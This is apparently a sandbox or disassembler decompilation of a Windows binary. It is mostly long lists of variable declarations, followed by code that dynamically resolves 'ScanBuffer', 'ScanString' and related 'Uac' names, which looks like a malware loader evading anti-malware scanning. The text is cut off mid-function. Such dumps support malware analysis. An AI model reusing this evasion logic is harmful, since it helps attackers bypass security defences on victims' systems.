                                                                                                  				char _v1808;
                                                                                                  				char _v1812;
                                                                                                  				intOrPtr _v1816;
                                                                                                  				char _v1820;
                                                                                                  				char _v1824;
                                                                                                  				char _v1828;
                                                                                                  				intOrPtr _v1832;
                                                                                                  				char _v1836;
                                                                                                  				char _v1840;
                                                                                                  				char _v1844;
                                                                                                  				intOrPtr _v1848;
                                                                                                  				char _v1852;
                                                                                                  				char _v1856;
                                                                                                  				char _v1860;
                                                                                                  				intOrPtr _v1864;
                                                                                                  				char _v1868;
                                                                                                  				char _v1872;
                                                                                                  				char _v1876;
                                                                                                  				intOrPtr _v1880;
                                                                                                  				char _v1884;
                                                                                                  				char _v1888;
                                                                                                  				char _v1892;
                                                                                                  				intOrPtr _v1896;
                                                                                                  				char _v1900;
                                                                                                  				char _v1904;
                                                                                                  				char _v1908;
                                                                                                  				intOrPtr _v1912;
                                                                                                  				char _v1916;
                                                                                                  				char _v1920;
                                                                                                  				void* _v1924;
                                                                                                  				char _v1928;
                                                                                                  				char _v1932;
                                                                                                  				char _v1936;
                                                                                                  				intOrPtr _v1940;
                                                                                                  				char _v1944;
                                                                                                  				char _v1948;
                                                                                                  				char _v1952;
                                                                                                  				intOrPtr _v1956;
                                                                                                  				char _v1960;
                                                                                                  				char _v1964;
                                                                                                  				char _v1968;
                                                                                                  				char _v1972;
                                                                                                  				char _v1976;
                                                                                                  				intOrPtr _v1980;
                                                                                                  				char _v1984;
                                                                                                  				char _v1988;
                                                                                                  				char _v1992;
                                                                                                  				intOrPtr _v1996;
                                                                                                  				char _v2000;
                                                                                                  				char _v2004;
                                                                                                  				char _v2008;
                                                                                                  				intOrPtr _v2012;
                                                                                                  				char _v2104;
                                                                                                  				char _v2108;
                                                                                                  				intOrPtr _v2112;
                                                                                                  				char _v2116;
                                                                                                  				char _v2120;
                                                                                                  				char _v2124;
                                                                                                  				intOrPtr _v2128;
                                                                                                  				char _v2132;
                                                                                                  				char _v2136;
                                                                                                  				char _v2140;
                                                                                                  				char _v2144;
                                                                                                  				intOrPtr _v2148;
                                                                                                  				char _v2152;
                                                                                                  				char _v2156;
                                                                                                  				char _v2160;
                                                                                                  				intOrPtr _v2164;
                                                                                                  				char _v2168;
                                                                                                  				char _v2172;
                                                                                                  				char _v2176;
                                                                                                  				intOrPtr _v2180;
                                                                                                  				char _v2184;
                                                                                                  				char _v2188;
                                                                                                  				char _v2192;
                                                                                                  				char _v2196;
                                                                                                  				intOrPtr _v2200;
                                                                                                  				char _v2204;
                                                                                                  				char _v2208;
                                                                                                  				char _v2212;
                                                                                                  				intOrPtr _v2216;
                                                                                                  				char _v2220;
                                                                                                  				char _v2224;
                                                                                                  				char _v2228;
                                                                                                  				intOrPtr _v2232;
                                                                                                  				char _v2236;
                                                                                                  				char _v2240;
                                                                                                  				char _v2244;
                                                                                                  				char _v2248;
                                                                                                  				char _v2252;
                                                                                                  				intOrPtr _v2256;
                                                                                                  				char _v2260;
                                                                                                  				char _v2264;
                                                                                                  				char _v2268;
                                                                                                  				intOrPtr _v2272;
                                                                                                  				char _v2276;
                                                                                                  				char _v2280;
                                                                                                  				char _v2284;
                                                                                                  				intOrPtr _v2288;
                                                                                                  				char _v2292;
                                                                                                  				char _v2296;
                                                                                                  				char _v2300;
                                                                                                  				intOrPtr _v2304;
                                                                                                  				char _v2308;
                                                                                                  				intOrPtr _v2312;
                                                                                                  				char _v2316;
                                                                                                  				char _v2320;
                                                                                                  				char _v2324;
                                                                                                  				char _v2328;
                                                                                                  				intOrPtr _v2332;
                                                                                                  				char _v2336;
                                                                                                  				char _v2340;
                                                                                                  				char _v2344;
                                                                                                  				intOrPtr _v2348;
                                                                                                  				char _v2352;
                                                                                                  				char _v2356;
                                                                                                  				char _v2360;
                                                                                                  				intOrPtr _v2364;
                                                                                                  				char _v2368;
                                                                                                  				char _v2372;
                                                                                                  				char _v2376;
                                                                                                  				char _v2380;
                                                                                                  				intOrPtr _v2384;
                                                                                                  				char _v2388;
                                                                                                  				char _v2392;
                                                                                                  				char _v2396;
                                                                                                  				intOrPtr _v2400;
                                                                                                  				char _v2452;
                                                                                                  				char _v2456;
                                                                                                  				char _v2460;
                                                                                                  				char _v2464;
                                                                                                  				char _v2516;
                                                                                                  				char _v2568;
                                                                                                  				char _v2572;
                                                                                                  				char _v2576;
                                                                                                  				char _v2580;
                                                                                                  				char _v2680;
                                                                                                  				char _v2684;
                                                                                                  				char _v2688;
                                                                                                  				char _v2692;
                                                                                                  				char _v2844;
                                                                                                  				char _v2848;
                                                                                                  				char _v2852;
                                                                                                  				char _v2856;
                                                                                                  				char _v2904;
                                                                                                  				char _v2908;
                                                                                                  				char _v2920;
                                                                                                  				char _v2988;
                                                                                                  				char _v3276;
                                                                                                  				char _v3300;
                                                                                                  				char _v3332;
                                                                                                  				char _v3344;
                                                                                                  				char _v3348;
                                                                                                  				intOrPtr _v3352;
                                                                                                  				char _v3356;
                                                                                                  				char _v3360;
                                                                                                  				char _v3364;
                                                                                                  				intOrPtr _v3368;
                                                                                                  				char _v3372;
                                                                                                  				char _v3376;
                                                                                                  				char _v3380;
                                                                                                  				intOrPtr _v3384;
                                                                                                  				char _v3388;
                                                                                                  				char _v3392;
                                                                                                  				char _v3396;
                                                                                                  				intOrPtr _v3400;
                                                                                                  				char _v3404;
                                                                                                  				char _v3408;
                                                                                                  				char _v3412;
                                                                                                  				intOrPtr _v3416;
                                                                                                  				char _v3420;
                                                                                                  				char _v3424;
                                                                                                  				char _v3428;
                                                                                                  				intOrPtr _v3432;
                                                                                                  				char _v3436;
                                                                                                  				char _v3440;
                                                                                                  				char _v3444;
                                                                                                  				intOrPtr _v3448;
                                                                                                  				char _v3452;
                                                                                                  				char _v3456;
                                                                                                  				char _v3460;
                                                                                                  				char _v3464;
                                                                                                  				intOrPtr _v3468;
                                                                                                  				char _v3472;
                                                                                                  				char _v3476;
                                                                                                  				char _v3480;
                                                                                                  				char _v3484;
                                                                                                  				intOrPtr _v3488;
                                                                                                  				char _v3492;
                                                                                                  				char _v3496;
                                                                                                  				char _v3500;
                                                                                                  				intOrPtr _v3504;
                                                                                                  				char _v3508;
                                                                                                  				char _v3512;
                                                                                                  				char _v3516;
                                                                                                  				intOrPtr _v3520;
                                                                                                  				char _v3524;
                                                                                                  				char _v3528;
                                                                                                  				char _v3532;
                                                                                                  				intOrPtr _v3536;
                                                                                                  				char _v3540;
                                                                                                  				char _v3544;
                                                                                                  				char _v3548;
                                                                                                  				intOrPtr _v3552;
                                                                                                  				char _v3556;
                                                                                                  				char _v3560;
                                                                                                  				char _v3564;
                                                                                                  				intOrPtr _v3568;
                                                                                                  				char _v3572;
                                                                                                  				char _v3576;
                                                                                                  				char _v3580;
                                                                                                  				intOrPtr _v3584;
                                                                                                  				char _v3588;
                                                                                                  				char _v3592;
                                                                                                  				char _v3596;
                                                                                                  				intOrPtr _v3600;
                                                                                                  				char _v3604;
                                                                                                  				char _v3608;
                                                                                                  				char _v3612;
                                                                                                  				intOrPtr _v3616;
                                                                                                  				char _v3620;
                                                                                                  				char _v3624;
                                                                                                  				char _v3628;
                                                                                                  				intOrPtr _v3632;
                                                                                                  				char _v3636;
                                                                                                  				char _v3640;
                                                                                                  				char _v3676;
                                                                                                  				intOrPtr _v3680;
                                                                                                  				char _v3684;
                                                                                                  				char _v3688;
                                                                                                  				char _v3692;
                                                                                                  				intOrPtr _v3696;
                                                                                                  				char _v3700;
                                                                                                  				char _v3704;
                                                                                                  				char _v3708;
                                                                                                  				intOrPtr _v3712;
                                                                                                  				char _v3716;
                                                                                                  				char _v3720;
                                                                                                  				char _v3724;
                                                                                                  				intOrPtr _v3728;
                                                                                                  				char _v3732;
                                                                                                  				char _v3736;
                                                                                                  				char _v3740;
                                                                                                  				intOrPtr _v3744;
                                                                                                  				char _v3748;
                                                                                                  				char _v3752;
                                                                                                  				char _v3756;
                                                                                                  				intOrPtr _v3760;
                                                                                                  				char _v3764;
                                                                                                  				char _v3768;
                                                                                                  				intOrPtr _v3772;
                                                                                                  				char _v3776;
                                                                                                  				char _v3780;
                                                                                                  				intOrPtr _v3784;
                                                                                                  				char _v3788;
                                                                                                  				char _v3792;
                                                                                                  				char _v3796;
                                                                                                  				intOrPtr _v3800;
                                                                                                  				char _v3804;
                                                                                                  				char _v3808;
                                                                                                  				char _v3812;
                                                                                                  				intOrPtr _v3816;
                                                                                                  				char _v3820;
                                                                                                  				char _v3824;
                                                                                                  				char _v3828;
                                                                                                  				intOrPtr _v3832;
                                                                                                  				char _v3836;
                                                                                                  				char _v3840;
                                                                                                  				char _v3844;
                                                                                                  				char _v3848;
                                                                                                  				intOrPtr _v3852;
                                                                                                  				char _v3856;
                                                                                                  				char _v3860;
                                                                                                  				char _v3864;
                                                                                                  				intOrPtr _v3868;
                                                                                                  				char _v3872;
                                                                                                  				char _v3876;
                                                                                                  				char _v3880;
                                                                                                  				char _v3884;
                                                                                                  				char _v3888;
                                                                                                  				char _v3892;
                                                                                                  				intOrPtr _v3896;
                                                                                                  				char _v3900;
                                                                                                  				char _v3904;
                                                                                                  				char _v3908;
                                                                                                  				intOrPtr _v3912;
                                                                                                  				char _v3916;
                                                                                                  				char _v3920;
                                                                                                  				char _v3924;
                                                                                                  				intOrPtr _v3928;
                                                                                                  				char _v3932;
                                                                                                  				char _v3936;
                                                                                                  				char _v3940;
                                                                                                  				char _v3944;
                                                                                                  				intOrPtr _v3948;
                                                                                                  				char _v3952;
                                                                                                  				char _v3956;
                                                                                                  				char _v3960;
                                                                                                  				intOrPtr _v3964;
                                                                                                  				char _v3968;
                                                                                                  				char _v3972;
                                                                                                  				char _v3976;
                                                                                                  				char _v3980;
                                                                                                  				char _v3984;
                                                                                                  				intOrPtr _v3988;
                                                                                                  				char _v3992;
                                                                                                  				char _v3996;
                                                                                                  				char _v4000;
                                                                                                  				intOrPtr _v4004;
                                                                                                  				char _v4008;
                                                                                                  				char _v4012;
                                                                                                  				char _v4016;
                                                                                                  				intOrPtr _v4020;
                                                                                                  				char _v4024;
                                                                                                  				char _v4028;
                                                                                                  				char _v4032;
                                                                                                  				char _v4036;
                                                                                                  				char _v4040;
                                                                                                  				char _v4044;
                                                                                                  				char _v4048;
                                                                                                  				char _v4052;
                                                                                                  				char _v4056;
                                                                                                  				char _v4060;
                                                                                                  				char _v4064;
                                                                                                  				char _v4068;
                                                                                                  				char _v4072;
                                                                                                  				char _v4076;
                                                                                                  				char _v4080;
                                                                                                  				char _v4084;
                                                                                                  				char _v4088;
                                                                                                  				char _v4092;
                                                                                                  				char _v4096;
                                                                                                  				char _v4100;
                                                                                                  				char _v4104;
                                                                                                  				intOrPtr _v4108;
                                                                                                  				char _v4112;
                                                                                                  				char _v4116;
                                                                                                  				char _v4120;
                                                                                                  				intOrPtr _v4124;
                                                                                                  				char _v4128;
                                                                                                  				char _v4132;
                                                                                                  				char _v4136;
                                                                                                  				intOrPtr _v4140;
                                                                                                  				char _v4144;
                                                                                                  				char _v4148;
                                                                                                  				char _v4152;
                                                                                                  				char _v4156;
                                                                                                  				char _v4160;
                                                                                                  				char _v4164;
                                                                                                  				char _v4168;
                                                                                                  				char _v4172;
                                                                                                  				char _v4176;
                                                                                                  				char _v4180;
                                                                                                  				char _v4184;
                                                                                                  				char _v4188;
                                                                                                  				char _v4192;
                                                                                                  				char _v4196;
                                                                                                  				char _v4200;
                                                                                                  				char _v4204;
                                                                                                  				char _v4208;
                                                                                                  				char _v4212;
                                                                                                  				char _v4216;
                                                                                                  				char _v4220;
                                                                                                  				char _v4224;
                                                                                                  				char _v4228;
                                                                                                  				char _v4232;
                                                                                                  				char _v4236;
                                                                                                  				char _v4240;
                                                                                                  				char _v4244;
                                                                                                  				char _v4248;
                                                                                                  				char _v4252;
                                                                                                  				char _v4256;
                                                                                                  				char _v4260;
                                                                                                  				char _v4264;
                                                                                                  				char _v4268;
                                                                                                  				char _v4272;
                                                                                                  				char _v4276;
                                                                                                  				char _v4280;
                                                                                                  				char _v4284;
                                                                                                  				char _v4288;
                                                                                                  				char _v4292;
                                                                                                  				char _v4296;
                                                                                                  				char _v4300;
                                                                                                  				char _v4304;
                                                                                                  				char _v4308;
                                                                                                  				char _v4312;
                                                                                                  				char _v4316;
                                                                                                  				char _v4320;
                                                                                                  				char _v4324;
                                                                                                  				char _v4328;
                                                                                                  				intOrPtr _v4332;
                                                                                                  				char _v4336;
                                                                                                  				char _v4340;
                                                                                                  				char _v4344;
                                                                                                  				intOrPtr _v4348;
                                                                                                  				char _v4352;
                                                                                                  				char _v4356;
                                                                                                  				char _v4360;
                                                                                                  				intOrPtr _v4364;
                                                                                                  				char _v4368;
                                                                                                  				char _v4372;
                                                                                                  				intOrPtr _t1978;
                                                                                                  				void* _t1983;
                                                                                                  				intOrPtr _t2062;
                                                                                                  				intOrPtr _t2140;
                                                                                                  				void* _t2141;
                                                                                                  				intOrPtr _t2170;
                                                                                                  				intOrPtr _t2171;
                                                                                                  				intOrPtr _t2345;
                                                                                                  				void* _t2346;
                                                                                                  				intOrPtr _t2347;
                                                                                                  				intOrPtr _t2407;
                                                                                                  				intOrPtr _t2469;
                                                                                                  				intOrPtr _t2581;
                                                                                                  				intOrPtr _t2615;
                                                                                                  				intOrPtr _t2616;
                                                                                                  				intOrPtr _t2674;
                                                                                                  				intOrPtr _t2704;
                                                                                                  				intOrPtr _t2750;
                                                                                                  				void* _t2751;
                                                                                                  				intOrPtr _t2752;
                                                                                                  				intOrPtr _t2798;
                                                                                                  				intOrPtr _t2846;
                                                                                                  				intOrPtr _t2890;
                                                                                                  				intOrPtr _t2934;
                                                                                                  				intOrPtr _t3348;
                                                                                                  				intOrPtr _t3392;
                                                                                                  				intOrPtr _t3427;
                                                                                                  				intOrPtr* _t3428;
                                                                                                  				intOrPtr _t3473;
                                                                                                  				intOrPtr _t3548;
                                                                                                  				intOrPtr _t3625;
                                                                                                  				intOrPtr _t3703;
                                                                                                  				intOrPtr _t3705;
                                                                                                  				intOrPtr* _t3735;
                                                                                                  				void* _t3736;
                                                                                                  				intOrPtr _t3737;
                                                                                                  				intOrPtr _t3781;
                                                                                                  				intOrPtr _t3782;
                                                                                                  				intOrPtr _t3785;
                                                                                                  				intOrPtr* _t3793;
                                                                                                  				intOrPtr* _t3811;
                                                                                                  				intOrPtr* _t3861;
                                                                                                  				intOrPtr* _t3882;
                                                                                                  				intOrPtr _t3885;
                                                                                                  				intOrPtr* _t4210;
                                                                                                  				intOrPtr* _t4213;
                                                                                                  				intOrPtr* _t4221;
                                                                                                  				intOrPtr* _t4257;
                                                                                                  				intOrPtr* _t4292;
                                                                                                  				intOrPtr _t4295;
                                                                                                  				intOrPtr _t4325;
                                                                                                  				intOrPtr _t4360;
                                                                                                  				void* _t4361;
                                                                                                  				intOrPtr _t4362;
                                                                                                  				intOrPtr _t4450;
                                                                                                  				intOrPtr* _t4451;
                                                                                                  				intOrPtr* _t4630;
                                                                                                  				intOrPtr* _t4631;
                                                                                                  				intOrPtr _t4688;
                                                                                                  				intOrPtr* _t4692;
                                                                                                  				intOrPtr _t4805;
                                                                                                  				intOrPtr _t4897;
                                                                                                  				void* _t4899;
                                                                                                  				intOrPtr _t4900;
                                                                                                  				intOrPtr _t4901;
                                                                                                  				intOrPtr _t4902;
                                                                                                  				intOrPtr _t4903;
                                                                                                  				intOrPtr _t4904;
                                                                                                  				intOrPtr _t4905;
                                                                                                  				intOrPtr _t4906;
                                                                                                  				intOrPtr _t4907;
                                                                                                  				intOrPtr _t4908;
                                                                                                  				intOrPtr _t4909;
                                                                                                  				intOrPtr _t4910;
                                                                                                  				intOrPtr _t4911;
                                                                                                  				intOrPtr _t4912;
                                                                                                  				intOrPtr _t4913;
                                                                                                  				intOrPtr _t4914;
                                                                                                  				intOrPtr _t4915;
                                                                                                  				intOrPtr _t4916;
                                                                                                  				intOrPtr _t4917;
                                                                                                  				intOrPtr _t4918;
                                                                                                  				intOrPtr _t4919;
                                                                                                  				intOrPtr _t4920;
                                                                                                  				intOrPtr _t4921;
                                                                                                  				intOrPtr _t4923;
                                                                                                  				intOrPtr _t4924;
                                                                                                  				intOrPtr _t4925;
                                                                                                  				intOrPtr _t4926;
                                                                                                  				intOrPtr _t4927;
                                                                                                  				intOrPtr _t4928;
                                                                                                  				intOrPtr _t4929;
                                                                                                  				intOrPtr _t4930;
                                                                                                  				intOrPtr _t4933;
                                                                                                  				intOrPtr _t4934;
                                                                                                  				intOrPtr _t4935;
                                                                                                  				intOrPtr _t4936;
                                                                                                  				intOrPtr _t4938;
                                                                                                  				intOrPtr _t4939;
                                                                                                  				intOrPtr _t4940;
                                                                                                  				intOrPtr _t4941;
                                                                                                  				intOrPtr _t4942;
                                                                                                  				intOrPtr _t4943;
                                                                                                  				intOrPtr _t4944;
                                                                                                  				intOrPtr _t4945;
                                                                                                  				intOrPtr _t4947;
                                                                                                  				intOrPtr _t4948;
                                                                                                  				intOrPtr _t4949;
                                                                                                  				intOrPtr _t4950;
                                                                                                  				intOrPtr _t4951;
                                                                                                  				intOrPtr _t4952;
                                                                                                  				intOrPtr _t4953;
                                                                                                  				intOrPtr _t4954;
                                                                                                  				intOrPtr _t4955;
                                                                                                  				intOrPtr _t4958;
                                                                                                  				intOrPtr _t4959;
                                                                                                  				intOrPtr _t4960;
                                                                                                  				intOrPtr _t4961;
                                                                                                  				intOrPtr _t4962;
                                                                                                  				intOrPtr _t4963;
                                                                                                  				intOrPtr _t4965;
                                                                                                  				intOrPtr _t4966;
                                                                                                  				intOrPtr _t4967;
                                                                                                  				intOrPtr _t4969;
                                                                                                  				intOrPtr _t4970;
                                                                                                  				intOrPtr _t4971;
                                                                                                  				intOrPtr _t4972;
                                                                                                  				intOrPtr _t4973;
                                                                                                  				intOrPtr _t4974;
                                                                                                  				intOrPtr _t4975;
                                                                                                  				intOrPtr _t4976;
                                                                                                  				intOrPtr _t4977;
                                                                                                  				intOrPtr _t4978;
                                                                                                  				intOrPtr _t4979;
                                                                                                  				intOrPtr _t4980;
                                                                                                  				intOrPtr _t4981;
                                                                                                  				intOrPtr _t4982;
                                                                                                  				intOrPtr _t4983;
                                                                                                  				intOrPtr _t4984;
                                                                                                  				intOrPtr _t4985;
                                                                                                  				intOrPtr _t4986;
                                                                                                  				intOrPtr _t4987;
                                                                                                  				intOrPtr _t4988;
                                                                                                  				intOrPtr _t4989;
                                                                                                  				intOrPtr _t4990;
                                                                                                  				intOrPtr _t4991;
                                                                                                  				intOrPtr _t4993;
                                                                                                  				intOrPtr _t4994;
                                                                                                  				intOrPtr _t4995;
                                                                                                  				intOrPtr _t4996;
                                                                                                  				intOrPtr _t4997;
                                                                                                  				intOrPtr _t4998;
                                                                                                  				intOrPtr _t4999;
                                                                                                  				intOrPtr _t5000;
                                                                                                  				intOrPtr _t5001;
                                                                                                  				intOrPtr _t5002;
                                                                                                  				intOrPtr _t5004;
                                                                                                  				intOrPtr _t5005;
                                                                                                  				intOrPtr _t5006;
                                                                                                  				intOrPtr _t5007;
                                                                                                  				intOrPtr _t5008;
                                                                                                  				intOrPtr _t5009;
                                                                                                  				intOrPtr _t5010;
                                                                                                  				intOrPtr _t5011;
                                                                                                  				intOrPtr _t5012;
                                                                                                  				intOrPtr _t5013;
                                                                                                  				intOrPtr _t5014;
                                                                                                  				intOrPtr _t5015;
                                                                                                  				intOrPtr _t5016;
                                                                                                  				intOrPtr* _t5017;
                                                                                                  				intOrPtr _t5018;
                                                                                                  				intOrPtr _t5019;
                                                                                                  				intOrPtr _t5023;
                                                                                                  				intOrPtr _t5024;
                                                                                                  				intOrPtr _t5025;
                                                                                                  				intOrPtr* _t5028;
                                                                                                  				intOrPtr _t5029;
                                                                                                  				intOrPtr _t5030;
                                                                                                  				intOrPtr _t5031;
                                                                                                  				intOrPtr _t5032;
                                                                                                  				intOrPtr _t5034;
                                                                                                  				intOrPtr _t5038;
                                                                                                  				intOrPtr _t5039;
                                                                                                  				intOrPtr _t5040;
                                                                                                  				intOrPtr _t5041;
                                                                                                  				intOrPtr _t5042;
                                                                                                  				intOrPtr _t5043;
                                                                                                  				intOrPtr _t5044;
                                                                                                  				intOrPtr _t5045;
                                                                                                  				intOrPtr _t5046;
                                                                                                  				intOrPtr _t5047;
                                                                                                  				intOrPtr _t5048;
                                                                                                  				intOrPtr _t5049;
                                                                                                  				intOrPtr _t5050;
                                                                                                  				intOrPtr _t5051;
                                                                                                  				intOrPtr _t5052;
                                                                                                  				intOrPtr _t5053;
                                                                                                  				intOrPtr _t5054;
                                                                                                  				intOrPtr _t5055;
                                                                                                  				intOrPtr _t5056;
                                                                                                  				intOrPtr _t5057;
                                                                                                  				intOrPtr _t5058;
                                                                                                  				intOrPtr _t5063;
                                                                                                  				intOrPtr _t5064;
                                                                                                  				intOrPtr _t5067;
                                                                                                  				intOrPtr _t5068;
                                                                                                  				intOrPtr _t5072;
                                                                                                  				intOrPtr _t5073;
                                                                                                  				intOrPtr _t5074;
                                                                                                  				intOrPtr _t5075;
                                                                                                  				intOrPtr _t5077;
                                                                                                  				intOrPtr _t5078;
                                                                                                  				intOrPtr _t5079;
                                                                                                  				intOrPtr _t5080;
                                                                                                  				intOrPtr _t5081;
                                                                                                  				intOrPtr _t5082;
                                                                                                  				intOrPtr _t5083;
                                                                                                  				intOrPtr _t5084;
                                                                                                  				intOrPtr _t5085;
                                                                                                  				intOrPtr _t5086;
                                                                                                  				intOrPtr _t5087;
                                                                                                  				intOrPtr _t5088;
                                                                                                  				intOrPtr _t5089;
                                                                                                  				intOrPtr _t5090;
                                                                                                  				intOrPtr _t5091;
                                                                                                  				intOrPtr _t5092;
                                                                                                  				intOrPtr _t5093;
                                                                                                  				intOrPtr _t5094;
                                                                                                  				intOrPtr _t5095;
                                                                                                  				intOrPtr _t5096;
                                                                                                  				intOrPtr _t5097;
                                                                                                  				intOrPtr _t5098;
                                                                                                  				intOrPtr _t5099;
                                                                                                  				intOrPtr _t5100;
                                                                                                  				intOrPtr _t5101;
                                                                                                  				intOrPtr _t5102;
                                                                                                  				intOrPtr _t5103;
                                                                                                  				intOrPtr _t5104;
                                                                                                  				intOrPtr _t5105;
                                                                                                  				intOrPtr _t5106;
                                                                                                  				intOrPtr _t5107;
                                                                                                  				intOrPtr _t5108;
                                                                                                  				intOrPtr _t5109;
                                                                                                  				intOrPtr _t5110;
                                                                                                  				intOrPtr _t5111;
                                                                                                  				intOrPtr _t5112;
                                                                                                  				void* _t5118;
                                                                                                  				void* _t5123;
                                                                                                  				void* _t5128;
                                                                                                  				void* _t5133;
                                                                                                  				void* _t5138;
                                                                                                  				void* _t5143;
                                                                                                  				void* _t5148;
                                                                                                  				void* _t5155;
                                                                                                  				void* _t5161;
                                                                                                  				void* _t5169;
                                                                                                  				void* _t5174;
                                                                                                  				void* _t5179;
                                                                                                  				void* _t5184;
                                                                                                  				void* _t5190;
                                                                                                  				void* _t5195;
                                                                                                  				void* _t5200;
                                                                                                  				void* _t5206;
                                                                                                  				void* _t5212;
                                                                                                  				void* _t5217;
                                                                                                  				intOrPtr _t5218;
                                                                                                  				void* _t5225;
                                                                                                  				void* _t5230;
                                                                                                  				void* _t5237;
                                                                                                  				void* _t5242;
                                                                                                  				void* _t5247;
                                                                                                  				void* _t5256;
                                                                                                  				void* _t5261;
                                                                                                  				void* _t5266;
                                                                                                  				void* _t5271;
                                                                                                  				intOrPtr _t5272;
                                                                                                  				intOrPtr _t5294;
                                                                                                  				intOrPtr _t5300;
                                                                                                  				void* _t5310;
                                                                                                  				void* _t5315;
                                                                                                  				void* _t5320;
                                                                                                  				void* _t5325;
                                                                                                  				void* _t5332;
                                                                                                  				void* _t5337;
                                                                                                  				void* _t5342;
                                                                                                  				void* _t5347;
                                                                                                  				void* _t5354;
                                                                                                  				void* _t5359;
                                                                                                  				void* _t5364;
                                                                                                  				intOrPtr _t6272;
                                                                                                  				void* _t6274;
                                                                                                  				void* _t6275;
                                                                                                  				intOrPtr _t6277;
                                                                                                  				intOrPtr _t6278;
                                                                                                  				void* _t6295;
                                                                                                  
                                                                                                  				_t6295 = __fp0;
                                                                                                  				_t6275 = __esi;
                                                                                                  				_t6274 = __edi;
                                                                                                  				_t6277 = _t6278;
                                                                                                  				_t4899 = 0x222;
                                                                                                  				do {
                                                                                                  					_push(0);
                                                                                                  					_push(0);
                                                                                                  					_t4899 = _t4899 - 1;
                                                                                                  				} while (_t4899 != 0);
                                                                                                  				_push(__ebx);
                                                                                                  				_push(_t6277);
                                                                                                  				_push(0x2874c19);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t6278;
                                                                                                  				_push(0x8ae); // executed
                                                                                                  				L02867B1C(); // executed
                                                                                                  				if(0 == 0) {
                                                                                                  					E028544F4(0x28a65fc, 0x2874c40);
                                                                                                  				} else {
                                                                                                  					E028544F4(0x28a65fc, 0x2874c30);
                                                                                                  				}
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("OpenSession");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v8, E02854964(_v12));
                                                                                                  				_push(_v8);
                                                                                                  				_t4900 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v20, _t4900, 0x2874c4c);
                                                                                                  				E02854698( &_v16, E02854964(_v20));
                                                                                                  				_pop(_t5118); // executed
                                                                                                  				E02867B80(_v16, _t5118); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v24, E02854964(_v28));
                                                                                                  				_push(_v24);
                                                                                                  				_t4901 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v36, _t4901, 0x2874c4c);
                                                                                                  				E02854698( &_v32, E02854964(_v36));
                                                                                                  				_pop(_t5123); // executed
                                                                                                  				E02867B80(_v32, _t5123); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("Initialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v40, E02854964(_v44));
                                                                                                  				_push(_v40);
                                                                                                  				_t4902 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v52, _t4902, 0x2874c4c);
                                                                                                  				E02854698( &_v48, E02854964(_v52));
                                                                                                  				_pop(_t5128); // executed
                                                                                                  				E02867B80(_v48, _t5128); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("ScanBuffer");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v56, E02854964(_v60));
                                                                                                  				_push(_v56);
                                                                                                  				_t4903 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v68, _t4903, 0x2874c4c);
                                                                                                  				E02854698( &_v64, E02854964(_v68));
                                                                                                  				_pop(_t5133); // executed
                                                                                                  				E02867B80(_v64, _t5133); // executed
                                                                                                  				E02852EE0();
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("UacScan");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v72, E02854964(_v76));
                                                                                                  				_push(_v72);
                                                                                                  				_t4904 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v84, _t4904, 0x2874c4c);
                                                                                                  				E02854698( &_v80, E02854964(_v84));
                                                                                                  				_pop(_t5138); // executed
                                                                                                  				E02867B80(_v80, _t5138); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("UacInitialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v88, E02854964(_v92));
                                                                                                  				_push(_v88);
                                                                                                  				_t4905 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v100, _t4905, 0x2874c4c);
                                                                                                  				E02854698( &_v96, E02854964(_v100));
                                                                                                  				_pop(_t5143); // executed
                                                                                                  				E02867B80(_v96, _t5143); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("ScanBuffer");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v104, E02854964(_v108));
                                                                                                  				_push(_v104);
                                                                                                  				_t4906 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v116, _t4906, 0x2874c4c);
                                                                                                  				E02854698( &_v112, E02854964(_v116));
                                                                                                  				_pop(_t5148); // executed
                                                                                                  				E02867B80(_v112, _t5148); // executed
                                                                                                  				E02854698(0x28a659c, E02854964( *((intOrPtr*)(0x2877ad4 + E02867CB0(1, 3) * 4))));
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v120, E02854964(_v124));
                                                                                                  				_push(_v120);
                                                                                                  				_t4907 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v132, _t4907, 0x2874c4c);
                                                                                                  				E02854698( &_v128, E02854964(_v132));
                                                                                                  				_pop(_t5155); // executed
                                                                                                  				E02867B80(_v128, _t5155); // executed
                                                                                                  				_t4908 =  *0x28a659c; // 0x28c40a8
                                                                                                  				E028547B0( &_v136, _t4908, "C:\\Windows\\System32\\");
                                                                                                  				if(E02857E40(_v136) == 0) {
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanString");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v156, E02854964(_v160));
                                                                                                  					_push(_v156);
                                                                                                  					_t4909 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v168, _t4909, 0x2874c4c);
